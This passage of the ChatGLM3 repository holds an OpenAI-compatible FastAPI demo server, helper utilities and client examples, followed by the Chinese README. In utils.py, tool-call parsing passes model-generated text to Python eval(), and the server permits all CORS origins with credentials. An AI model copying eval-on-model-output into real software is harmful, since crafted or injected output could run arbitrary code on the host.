trust_remote_code=True ) return model, tokenizer @app.command() def main( model_dir: Annotated[str, typer.Argument(help='')], prompt: Annotated[str, typer.Option(help='')], ): model, tokenizer = load_model_and_tokenizer(model_dir) response, _ = model.chat(tokenizer, prompt) print(response) if __name__ == '__main__': app() File: openai_api_demo/langchain_openai_api.py """ This script is designed for interacting with a local GLM3 AI model using the `ChatGLM3` class from the `langchain_community` library. It facilitates continuous dialogue with the GLM3 model. 1. Start the Local Model Service: Before running this script, you need to execute the `api_server.py` script to start the GLM3 model's service. 2. Run the Script: The script includes functionality for initializing the LLMChain object and obtaining AI responses, allowing the user to input questions and receive AI answers. 3. This demo is not support for streaming. """ from langchain.schema.messages import HumanMessage, SystemMessage, AIMessage from langchain_community.llms.chatglm3 import ChatGLM3 def get_ai_response(messages, user_input): endpoint_url = "http://127.0.0.1:8000/v1/chat/completions" llm = ChatGLM3( endpoint_url=endpoint_url, max_tokens=4096, prefix_messages=messages, top_p=0.9 ) ai_response = llm.invoke(user_input) return ai_response def continuous_conversation(): messages = [ SystemMessage(content="You are an intelligent AI assistant, named ChatGLM3."), ] while True: user_input = input("Human (or 'exit' to quit): ") if user_input.lower() == 'exit': break ai_response = get_ai_response(messages, user_input) print("ChatGLM3: ", ai_response) messages += [ HumanMessage(content=user_input), AIMessage(content=ai_response), ] if __name__ == "__main__": continuous_conversation() File: openai_api_demo/api_server.py """ This script implements an API for the ChatGLM3-6B model, formatted similarly to OpenAI's API (https://platform.openai.com/docs/api-reference/chat). It's designed to be run as a web server using FastAPI and uvicorn, making the ChatGLM3-6B model accessible through OpenAI Client. Key Components and Features: - Model and Tokenizer Setup: Configures the model and tokenizer paths and loads them. 
- FastAPI Configuration: Sets up a FastAPI application with CORS middleware for handling cross-origin requests. - API Endpoints: - "/v1/models": Lists the available models, specifically ChatGLM3-6B. - "/v1/chat/completions": Processes chat completion requests with options for streaming and regular responses. - "/v1/embeddings": Processes Embedding request of a list of text inputs. - Token Limit Caution: In the OpenAI API, 'max_tokens' is equivalent to HuggingFace's 'max_new_tokens', not 'max_length'. For instance, setting 'max_tokens' to 8192 for a 6b model would result in an error due to the model's inability to output that many tokens after accounting for the history and prompt tokens. - Stream Handling and Custom Functions: Manages streaming responses and custom function calls within chat responses. - Pydantic Models: Defines structured models for requests and responses, enhancing API documentation and type safety. - Main Execution: Initializes the model and tokenizer, and starts the FastAPI app on the designated host and port. Note: This script doesn't include the setup for special tokens or multi-GPU support by default. Users need to configure their special tokens and can enable multi-GPU support as per the provided instructions. Embedding Models only support in One GPU. Running this script requires 14-15GB of GPU memory. 2 GB for the embedding model and 12-13 GB for the FP16 ChatGLM3 LLM. """ import os import time import tiktoken import torch import uvicorn from fastapi import FastAPI, HTTPException, Response from fastapi.middleware.cors import CORSMiddleware from contextlib import asynccontextmanager from typing import List, Literal, Optional, Union from loguru import logger from pydantic import BaseModel, Field from transformers import AutoTokenizer, AutoModel from utils import process_response, generate_chatglm3, generate_stream_chatglm3 from sentence_transformers import SentenceTransformer from sse_starlette.sse import EventSourceResponse # Set up limit request time EventSourceResponse.DEFAULT_PING_INTERVAL = 1000 # set LLM path MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) # set Embedding Model path EMBEDDING_PATH = os.environ.get('EMBEDDING_PATH', 'BAAI/bge-m3') @asynccontextmanager async def lifespan(app: FastAPI): yield if torch.cuda.is_available(): torch.cuda.empty_cache() torch.cuda.ipc_collect() app = FastAPI(lifespan=lifespan) app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) class ModelCard(BaseModel): id: str object: str = "model" created: int = Field(default_factory=lambda: int(time.time())) owned_by: str = "owner" root: Optional[str] = None parent: Optional[str] = None permission: Optional[list] = None class ModelList(BaseModel): object: str = "list" data: List[ModelCard] = [] class FunctionCallResponse(BaseModel): name: Optional[str] = None arguments: Optional[str] = None class ChatMessage(BaseModel): role: Literal["user", "assistant", "system", "function"] content: str = None name: Optional[str] = None function_call: Optional[FunctionCallResponse] = None class DeltaMessage(BaseModel): role: Optional[Literal["user", "assistant", "system"]] = None content: Optional[str] = None function_call: Optional[FunctionCallResponse] = None ## for Embedding class EmbeddingRequest(BaseModel): input: Union[List[str], str] model: str class CompletionUsage(BaseModel): prompt_tokens: int completion_tokens: int total_tokens: int class 
EmbeddingResponse(BaseModel): data: list model: str object: str usage: CompletionUsage # for ChatCompletionRequest class UsageInfo(BaseModel): prompt_tokens: int = 0 total_tokens: int = 0 completion_tokens: Optional[int] = 0 class ChatCompletionRequest(BaseModel): model: str messages: List[ChatMessage] temperature: Optional[float] = 0.8 top_p: Optional[float] = 0.8 max_tokens: Optional[int] = None stream: Optional[bool] = False tools: Optional[Union[dict, List[dict]]] = None repetition_penalty: Optional[float] = 1.1 class ChatCompletionResponseChoice(BaseModel): index: int message: ChatMessage finish_reason: Literal["stop", "length", "function_call"] class ChatCompletionResponseStreamChoice(BaseModel): delta: DeltaMessage finish_reason: Optional[Literal["stop", "length", "function_call"]] index: int class ChatCompletionResponse(BaseModel): model: str id: str object: Literal["chat.completion", "chat.completion.chunk"] choices: List[Union[ChatCompletionResponseChoice, ChatCompletionResponseStreamChoice]] created: Optional[int] = Field(default_factory=lambda: int(time.time())) usage: Optional[UsageInfo] = None @app.get("/health") async def health() -> Response: """Health check.""" return Response(status_code=200) @app.post("/v1/embeddings", response_model=EmbeddingResponse) async def get_embeddings(request: EmbeddingRequest): if isinstance(request.input, str): embeddings = [embedding_model.encode(request.input)] else: embeddings = [embedding_model.encode(text) for text in request.input] embeddings = [embedding.tolist() for embedding in embeddings] def num_tokens_from_string(string: str) -> int: """ Returns the number of tokens in a text string. use cl100k_base tokenizer """ encoding = tiktoken.get_encoding('cl100k_base') num_tokens = len(encoding.encode(string)) return num_tokens response = { "data": [ { "object": "embedding", "embedding": embedding, "index": index } for index, embedding in enumerate(embeddings) ], "model": request.model, "object": "list", "usage": CompletionUsage( prompt_tokens=sum(len(text.split()) for text in request.input), completion_tokens=0, total_tokens=sum(num_tokens_from_string(text) for text in request.input), ) } return response @app.get("/v1/models", response_model=ModelList) async def list_models(): model_card = ModelCard( id="chatglm3-6b" ) return ModelList( data=[model_card] ) @app.post("/v1/chat/completions", response_model=ChatCompletionResponse) async def create_chat_completion(request: ChatCompletionRequest): global model, tokenizer if len(request.messages) < 1 or request.messages[-1].role == "assistant": raise HTTPException(status_code=400, detail="Invalid request") gen_params = dict( messages=request.messages, temperature=request.temperature, top_p=request.top_p, max_tokens=request.max_tokens or 1024, echo=False, stream=request.stream, repetition_penalty=request.repetition_penalty, tools=request.tools, ) logger.debug(f"==== request ====\n{gen_params}") if request.stream: # Use the stream mode to read the first few characters, if it is not a function call, direct stram output predict_stream_generator = predict_stream(request.model, gen_params) output = next(predict_stream_generator) if not contains_custom_function(output): return EventSourceResponse(predict_stream_generator, media_type="text/event-stream") # Obtain the result directly at one time and determine whether tools needs to be called. 
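        # At this point `output` is the complete buffered text from predict_stream (it buffers the
        # whole response instead of streaming once the tool-call prefix heuristic fires), so it can
        # be parsed as a full function call below.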
logger.debug(f"First result output:\n{output}") function_call = None if output and request.tools: try: function_call = process_response(output, use_tool=True) except: logger.warning("Failed to parse tool call") # CallFunction if isinstance(function_call, dict): function_call = FunctionCallResponse(**function_call) """ In this demo, we did not register any tools. You can use the tools that have been implemented in our `tools_using_demo` and implement your own streaming tool implementation here. Similar to the following method: function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(tool_name: str, tool_params: dict) """ tool_response = "" if not gen_params.get("messages"): gen_params["messages"] = [] gen_params["messages"].append(ChatMessage( role="assistant", content=output, )) gen_params["messages"].append(ChatMessage( role="function", name=function_call.name, content=tool_response, )) # Streaming output of results after function calls generate = predict(request.model, gen_params) return EventSourceResponse(generate, media_type="text/event-stream") else: # Handled to avoid exceptions in the above parsing function process. generate = parse_output_text(request.model, output) return EventSourceResponse(generate, media_type="text/event-stream") # Here is the handling of stream = False response = generate_chatglm3(model, tokenizer, gen_params) # Remove the first newline character if response["text"].startswith("\n"): response["text"] = response["text"][1:] response["text"] = response["text"].strip() usage = UsageInfo() function_call, finish_reason = None, "stop" if request.tools: try: function_call = process_response(response["text"], use_tool=True) except: logger.warning("Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, dict): finish_reason = "function_call" function_call = FunctionCallResponse(**function_call) message = ChatMessage( role="assistant", content=response["text"], function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) logger.debug(f"==== message ====\n{message}") choice_data = ChatCompletionResponseChoice( index=0, message=message, finish_reason=finish_reason, ) task_usage = UsageInfo.model_validate(response["usage"]) for usage_key, usage_value in task_usage.model_dump().items(): setattr(usage, usage_key, getattr(usage, usage_key) + usage_value) return ChatCompletionResponse( model=request.model, id="", # for open_source model, id is empty choices=[choice_data], object="chat.completion", usage=usage ) async def predict(model_id: str, params: dict): global model, tokenizer choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant"), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) previous_text = "" for new_response in generate_stream_chatglm3(model, tokenizer, params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(previous_text):] previous_text = decoded_unicode finish_reason = new_response["finish_reason"] if len(delta_text) == 0 and finish_reason != "function_call": continue function_call = None if finish_reason == "function_call": try: function_call = process_response(decoded_unicode, use_tool=True) except: logger.warning( "Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, 
dict): function_call = FunctionCallResponse(**function_call) delta = DeltaMessage( content=delta_text, role="assistant", function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=delta, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def predict_stream(model_id, gen_params): """ The function call is compatible with stream mode output. The first seven characters are determined. If not a function call, the stream output is directly generated. Otherwise, the complete character content of the function call is returned. :param model_id: :param gen_params: :return: """ output = "" is_function_call = False has_send_first_chunk = False for new_response in generate_stream_chatglm3(model, tokenizer, gen_params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(output):] output = decoded_unicode # When it is not a function call and the character length is> 7, # try to judge whether it is a function call according to the special function prefix if not is_function_call and len(output) > 7: # Determine whether a function is called is_function_call = contains_custom_function(output) if is_function_call: continue # Non-function call, direct stream output finish_reason = new_response["finish_reason"] # Send an empty string first to avoid truncation by subsequent next() operations. 
if not has_send_first_chunk: message = DeltaMessage( content="", role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) send_msg = delta_text if has_send_first_chunk else output has_send_first_chunk = True message = DeltaMessage( content=send_msg, role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) if is_function_call: yield output else: yield '[DONE]' async def parse_output_text(model_id: str, value: str): """ Directly output the text content of value :param model_id: :param value: :return: """ choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant", content=value), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def contains_custom_function(value: str) -> bool: """ Determine whether 'function_call' according to a special function prefix. For example, the functions defined in "tools_using_demo/tool_register.py" are all "get_xxx" and start with "get_" [Note] This is not a rigorous judgment method, only for reference. 
:param value: :return: """ return value and 'get_' in value if __name__ == "__main__": # Load LLM tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() # load Embedding embedding_model = SentenceTransformer(EMBEDDING_PATH, device="cuda") uvicorn.run(app, host='0.0.0.0', port=8000, workers=1) File: openai_api_demo/utils.py import gc import json import torch from transformers import PreTrainedModel, PreTrainedTokenizer from transformers.generation.logits_process import LogitsProcessor from typing import Union, Tuple class InvalidScoreLogitsProcessor(LogitsProcessor): def __call__( self, input_ids: torch.LongTensor, scores: torch.FloatTensor ) -> torch.FloatTensor: if torch.isnan(scores).any() or torch.isinf(scores).any(): scores.zero_() scores[..., 5] = 5e4 return scores def process_response(output: str, use_tool: bool = False) -> Union[str, dict]: content = "" for response in output.split("<|assistant|>"): metadata, content = response.split("\n", maxsplit=1) if not metadata.strip(): content = content.strip() content = content.replace("[[训练时间]]", "2023年") else: if use_tool: content = "\n".join(content.split("\n")[1:-1]) def tool_call(**kwargs): return kwargs parameters = eval(content) content = { "name": metadata.strip(), "arguments": json.dumps(parameters, ensure_ascii=False) } else: content = { "name": metadata.strip(), "content": content } return content @torch.inference_mode() def generate_stream_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): messages = params["messages"] tools = params["tools"] temperature = float(params.get("temperature", 1.0)) repetition_penalty = float(params.get("repetition_penalty", 1.0)) top_p = float(params.get("top_p", 1.0)) max_new_tokens = int(params.get("max_tokens", 256)) echo = params.get("echo", True) messages = process_chatglm_messages(messages, tools=tools) query, role = messages[-1]["content"], messages[-1]["role"] inputs = tokenizer.build_chat_input(query, history=messages[:-1], role=role) inputs = inputs.to(model.device) input_echo_len = len(inputs["input_ids"][0]) if input_echo_len >= model.config.seq_length: print(f"Input length larger than {model.config.seq_length}") eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), tokenizer.get_command("<|observation|>") ] gen_kwargs = { "max_new_tokens": max_new_tokens, "do_sample": True if temperature > 1e-5 else False, "top_p": top_p, "repetition_penalty": repetition_penalty, "logits_processor": [InvalidScoreLogitsProcessor()], } if temperature > 1e-5: gen_kwargs["temperature"] = temperature total_len = 0 for total_ids in model.stream_generate(**inputs, eos_token_id=eos_token_id, **gen_kwargs): total_ids = total_ids.tolist()[0] total_len = len(total_ids) if echo: output_ids = total_ids[:-1] else: output_ids = total_ids[input_echo_len:-1] response = tokenizer.decode(output_ids) if response and response[-1] != "�": response, stop_found = apply_stopping_strings(response, ["<|observation|>"]) yield { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": total_len, }, "finish_reason": "function_call" if stop_found else None, } if stop_found: break # Only last stream result contains finish_reason, we set finish_reason as stop ret = { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": 
total_len, }, "finish_reason": "stop", } yield ret gc.collect() torch.cuda.empty_cache() def process_chatglm_messages(messages, tools=None): _messages = messages messages = [] msg_has_sys = False if tools: messages.append( { "role": "system", "content": "Answer the following questions as best as you can. You have access to the following tools:", "tools": tools } ) msg_has_sys = True for m in _messages: role, content, func_call = m.role, m.content, m.function_call if role == "function": messages.append( { "role": "observation", "content": content } ) elif role == "assistant" and func_call is not None: for response in content.split("<|assistant|>"): metadata, sub_content = response.split("\n", maxsplit=1) messages.append( { "role": role, "metadata": metadata, "content": sub_content.strip() } ) else: if role == "system" and msg_has_sys: msg_has_sys = False continue messages.append({"role": role, "content": content}) return messages def generate_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): for response in generate_stream_chatglm3(model, tokenizer, params): pass return response def apply_stopping_strings(reply, stop_strings) -> Tuple[str, bool]: stop_found = False for string in stop_strings: idx = reply.find(string) if idx != -1: reply = reply[:idx] stop_found = True break if not stop_found: # If something like "\nYo" is generated just before "\nYou: is completed, trim it for string in stop_strings: for j in range(len(string) - 1, 0, -1): if reply[-j:] == string[:j]: reply = reply[:-j] break else: continue break return reply, stop_found File: openai_api_demo/openai_api_request.py """ This script is an example of using the OpenAI API to create various interactions with a ChatGLM3 model. It includes functions to: 1. Conduct a basic chat session, asking about weather conditions in multiple cities. 2. Initiate a simple chat in Chinese, asking the model to tell a short story. 3. Retrieve and print embeddings for a given text input. Each function demonstrates a different aspect of the API's capabilities, showcasing how to make requests and handle responses. """ from openai import OpenAI base_url = "http://127.0.0.1:8000/v1/" client = OpenAI(api_key="EMPTY", base_url=base_url) def function_chat(): messages = [{"role": "user", "content": "What's the weather like in San Francisco, Tokyo, and Paris?"}] tools = [ { "type": "function", "function": { "name": "get_current_weather", "description": "Get the current weather in a given location", "parameters": { "type": "object", "properties": { "location": { "type": "string", "description": "The city and state, e.g. San Francisco, CA", }, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, }, "required": ["location"], }, }, } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, tools=tools, tool_choice="auto", ) if response: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) def simple_chat(use_stream=True): messages = [ { "role": "system", "content": "You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's " "instructions carefully. 
Respond using markdown.", }, { "role": "user", "content": "你好,请你用生动的话语给我讲一个小故事吧" } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, stream=use_stream, max_tokens=256, temperature=0.8, presence_penalty=1.1, top_p=0.8) if response: if use_stream: for chunk in response: print(chunk.choices[0].delta.content) else: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) def embedding(): response = client.embeddings.create( model="bge-large-zh-1.5", input=["你好,给我讲一个故事,大概100字"], ) embeddings = response.data[0].embedding print("嵌入完成,维度:", len(embeddings)) if __name__ == "__main__": simple_chat(use_stream=False) simple_chat(use_stream=True) embedding() function_chat()
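The request examples above all go through the `openai` client package. As a quick sanity check of the same demo server without that dependency, the chat completions route can also be exercised with a plain HTTP POST. The snippet below is a minimal sketch and not part of the repository: it assumes `api_server.py` is running locally on `127.0.0.1:8000` and serving the model name `chatglm3-6b`, exactly as configured in the scripts above, and it uses the third-party `requests` package.

```python
# Minimal sketch: call the locally running OpenAI-compatible demo server
# with plain HTTP instead of the openai client. Assumes api_server.py is
# listening on 127.0.0.1:8000 (as in the demo scripts above).
import requests

BASE_URL = "http://127.0.0.1:8000/v1"

payload = {
    "model": "chatglm3-6b",
    "messages": [
        {"role": "system", "content": "You are ChatGLM3. Follow the user's instructions carefully."},
        {"role": "user", "content": "请用一句话给我讲一个小故事。"},
    ],
    "stream": False,
    "max_tokens": 128,
    "temperature": 0.8,
    "top_p": 0.8,
}

resp = requests.post(f"{BASE_URL}/chat/completions", json=payload, timeout=120)
resp.raise_for_status()
print(resp.json()["choices"][0]["message"]["content"])
```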
# ChatGLM3

<p align="center">
📄<a href="https://arxiv.org/pdf/2406.12793" target="_blank"> Report </a> • 🤗 <a href="https://huggingface.co/THUDM/chatglm3-6b" target="_blank">HF Repo</a> • 🤖 <a href="https://modelscope.cn/models/ZhipuAI/chatglm3-6b" target="_blank">ModelScope</a> • 🟣 <a href="https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b" target="_blank">WiseModel</a> • 📔 <a href="https://lslfd0slxc.feishu.cn/wiki/WvQbwIJ9tiPAxGk8ywDck6yfnof" target="_blank">Document</a> • 🧰 <a href="https://openxlab.org.cn/models/hot/THUDM" target="_blank">OpenXLab</a> • 🐦 <a href="https://twitter.com/thukeg" target="_blank">Twitter</a><br>
</p>
<p align="center">
👋 加入我们的 <a href="https://discord.gg/fK2dz4bg" target="_blank">Discord</a> 和 <a href="resources/WECHAT.md" target="_blank">微信</a>
</p>
<p align="center">
📍在 <a href="https://www.chatglm.cn">chatglm.cn</a> 体验更大规模的 ChatGLM 模型。
</p>

[Read this in English.](./README_en.md)

📔 关于 `ChatGLM3-6B` 更为详细的使用信息,可以参考

+ [ChatGLM3 开放技术文档](https://lslfd0slxc.feishu.cn/wiki/WvQbwIJ9tiPAxGk8ywDck6yfnof?from=from_copylink)
+ [Bilibili video](https://www.bilibili.com/video/BV1uC4y1J7yA)
+ [YouTube video](https://www.youtube.com/watch?v=Pw9PB6R7ORA)

## GLM-4 开源模型和API

我们已经发布最新的 **GLM-4** 模型,该模型在多个指标上有了新的突破,您可以在以下两个渠道体验我们的最新模型。

+ [GLM-4 开源模型](https://github.com/THUDM/GLM-4) 我们已经开源了 GLM-4-9B 系列模型,在各项指标的测试上有明显提升,欢迎尝试。
+ [智谱清言](https://chatglm.cn/main/detail?fr=ecology_x) 体验最新版 GLM-4,包括 **GLMs、All tools** 等功能。
+ [API平台](https://open.bigmodel.cn/?utm_campaign=open&_channel_track_key=OWTVNma9) 新一代 API 平台已经上线,您可以直接在 API 平台上体验 `GLM-4-0520`、`GLM-4-air`、`GLM-4-airx`、`GLM-4-flash`、`GLM-4`、`GLM-3-Turbo`、`CharacterGLM-3`、`CogView-3` 等新模型。其中 `GLM-4`、`GLM-3-Turbo` 两个模型支持了 `System Prompt`、`Function Call`、`Retrieval`、`Web_Search` 等新功能,欢迎体验。
+ [GLM-4 API 开源教程](https://github.com/MetaGLM/glm-cookbook/) GLM-4 API 教程和基础应用,欢迎尝试。API 相关问题可以在本开源教程提出疑问,或者使用 [GLM-4 API AI助手](https://open.bigmodel.cn/shareapp/v1/?share_code=sQwt5qyqYVaNh1O_87p8O) 来获得常见问题的帮助。

-----

## ChatGLM3 介绍

**ChatGLM3** 是智谱AI和清华大学 KEG 实验室联合发布的对话预训练模型。ChatGLM3-6B 是 ChatGLM3 系列中的开源模型,在保留了前两代模型对话流畅、部署门槛低等众多优秀特性的基础上,ChatGLM3-6B 引入了如下特性:

1. **更强大的基础模型:** ChatGLM3-6B 的基础模型 ChatGLM3-6B-Base 采用了更多样的训练数据、更充分的训练步数和更合理的训练策略。在语义、数学、推理、代码、知识等不同角度的数据集上测评显示,**ChatGLM3-6B-Base 具有在 10B 以下的基础模型中最强的性能**。
2. **更完整的功能支持:** ChatGLM3-6B 采用了全新设计的 [Prompt 格式](PROMPT.md),除正常的多轮对话外,同时原生支持[工具调用](tools_using_demo/README.md)(Function Call)、代码执行(Code Interpreter)和 Agent 任务等复杂场景。
3.
**更全面的开源序列:** 除了对话模型 [ChatGLM3-6B](https://huggingface.co/THUDM/chatglm3-6b) 外,还开源了基础模型 [ChatGLM3-6B-Base](https://huggingface.co/THUDM/chatglm3-6b-base) 、长文本对话模型 [ChatGLM3-6B-32K](https://huggingface.co/THUDM/chatglm3-6b-32k) 和进一步强化了对于长文本理解能力的 [ChatGLM3-6B-128K](https://huggingface.co/THUDM/chatglm3-6b-128k)。以上所有权重对学术研究**完全开放** ,在填写 [问卷](https://open.bigmodel.cn/mla/form) 进行登记后**亦允许免费商业使用**。 ----- ChatGLM3 开源模型旨在与开源社区一起推动大模型技术发展,恳请开发者和大家遵守 [开源协议](MODEL_LICENSE) ,勿将开源模型和代码及基于开源项目产生的衍生物用于任何可能给国家和社会带来危害的用途以及用于任何未经过安全评估和备案的服务。目前,本项目团队未基于 **ChatGLM3 开源模型**开发任何应用,包括网页端、安卓、苹果 iOS 及 Windows App 等应用。 尽管模型在训练的各个阶段都尽力确保数据的合规性和准确性,但由于 ChatGLM3-6B 模型规模较小,且模型受概率随机性因素影响,无法保证输出内容的准确。同时模型的输出容易被用户的输入误导。* *本项目不承担开源模型和代码导致的数据安全、舆情风险或发生任何模型被误导、滥用、传播、不当利用而产生的风险和责任。** ## 模型列表 | Model | Seq Length | Download | |:----------------:|:----------:|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| | ChatGLM3-6B | 8k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b) \| [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b) \| [WiseModel](https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b) \| [OpenXLab](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b) | | ChatGLM3-6B-Base | 8k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b-base) \| [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b-base) \| [WiseModel](https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b-base) \| [OpenXLabl](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b-base)| | ChatGLM3-6B-32K | 32k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b-32k) \| [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b-32k) \| [WiseModel](https://www.wisemodel.cn/models/ZhipuAI/chatglm3-6b-32k) \| [OpenXLab](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b-32k) | | ChatGLM3-6B-128K | 128k | [HuggingFace](https://huggingface.co/THUDM/chatglm3-6b-128k) | [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b-128k)\| [OpenXLab](https://openxlab.org.cn/models/detail/THUDM/chatglm3-6b-128k) | <br> 请注意,所有模型的最新更新都会在 Huggingface 率先发布。 ModelScope 和 WiseModel 由于没有与 Huggingface 同步,需要开发人员手动更新,可能会在 Huggingface 更新后一段时间内同步更新。 ## 友情链接 以下优秀开源仓库已经对 ChatGLM3-6B 模型深度支持,欢迎大家扩展学习。 推理加速: * [chatglm.cpp](https://github.com/li-plus/chatglm.cpp): 类似 llama.cpp 的量化加速推理方案,实现笔记本上实时对话 * [ChatGLM3-TPU](https://github.com/sophgo/ChatGLM3-TPU): 采用TPU加速推理方案,在算能端侧芯片BM1684X(16T@FP16,内存16G)上实时运行约7.5 token/s * [TensorRT-LLM](https://github.com/NVIDIA/TensorRT-LLM/tree/main): NVIDIA开发的高性能 GPU 加速推理方案,可以参考此 [步骤](./tensorrt_llm_demo/README.md) 部署 ChatGLM3-6B 模型 * [OpenVINO](https://github.com/openvinotoolkit): Intel 开发的高性能 CPU 和 GPU 加速推理方案,可以参考此 [步骤](./Intel_device_demo/openvino_demo/README.md) 部署 ChatGLM3-6B 模型 高效微调: * [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory): 优秀易上手的高效微调框架。 应用框架: * [LangChain-Chatchat](https://github.com/chatchat-space/Langchain-Chatchat): 基于 ChatGLM 等大语言模型与 Langchain 等应用框架实现,开源、可离线部署的检索增强生成(RAG)大模型知识库项目。 * [BISHENG](https://github.com/dataelement/bisheng): 开源大模型应用开发平台,赋能和加速大模型应用开发落地,帮助用户以最佳体验进入下一代应用开发模式。 * [RAGFlow](https://github.com/infiniflow/ragflow): RAGFlow 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。可为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。 ## 评测结果 ### 典型任务 我们选取了 8 个中英文典型数据集,在 ChatGLM3-6B (base) 版本上进行了性能测试。 | Model | GSM8K | 
MATH | BBH | MMLU | C-Eval | CMMLU | MBPP | AGIEval | |------------------|:-----:|:----:|:----:|:----:|:------:|:-----:|:----:|:-------:| | ChatGLM2-6B-Base | 32.4 | 6.5 | 33.7 | 47.9 | 51.7 | 50.0 | - | - | | Best Baseline | 52.1 | 13.1 | 45.0 | 60.1 | 63.5 | 62.2 | 47.5 | 45.8 | | ChatGLM3-6B-Base | 72.3 | 25.7 | 66.1 | 61.4 | 69.0 | 67.5 | 52.4 | 53.7 | > Best Baseline 指的是截止 2023年10月27日、模型参数在 10B 以下、在对应数据集上表现最好的预训练模型,不包括只针对某一项任务训练而未保持通用能力的模型。 > 对 ChatGLM3-6B-Base 的测试中,BBH 采用 3-shot 测试,需要推理的 GSM8K、MATH 采用 0-shot CoT 测试,MBPP 采用 0-shot > 生成后运行测例计算 Pass@1 ,其他选择题类型数据集均采用 0-shot 测试。 我们在多个长文本应用场景下对 ChatGLM3-6B-32K 进行了人工评估测试。与二代模型相比,其效果平均提升了超过 50%。在论文阅读、文档摘要和财报分析等应用中,这种提升尤为显著。此外,我们还在 LongBench 评测集上对模型进行了测试,具体结果如下表所示 | Model | 平均 | Summary | Single-Doc QA | Multi-Doc QA | Code | Few-shot | Synthetic | |-----------------|:----:|:-------:|:-------------:|:------------:|:----:|:--------:|:---------:| | ChatGLM2-6B-32K | 41.5 | 24.8 | 37.6 | 34.7 | 52.8 | 51.3 | 47.7 | | ChatGLM3-6B-32K | 50.2 | 26.6 | 45.8 | 46.1 | 56.2 | 61.2 | 65 | ## 使用方式 ### 环境安装 首先需要下载本仓库: ```shell git clone https://github.com/THUDM/ChatGLM3 cd ChatGLM3 ``` 然后使用 pip 安装依赖: ``` pip install -r requirements.txt ``` + 为了保证 `torch` 的版本正确,请严格按照 [官方文档](https://pytorch.org/get-started/locally/) 的说明安装。 ### 综合 Demo 我们提供了一个集成以下三种功能的综合 Demo,运行方法请参考[综合 Demo](composite_demo/README.md) - Chat: 对话模式,在此模式下可以与模型进行对话。 - Tool: 工具模式,模型除了对话外,还可以通过工具进行其他操作。 <img src="resources/tool.png" width="400"> - Code Interpreter: 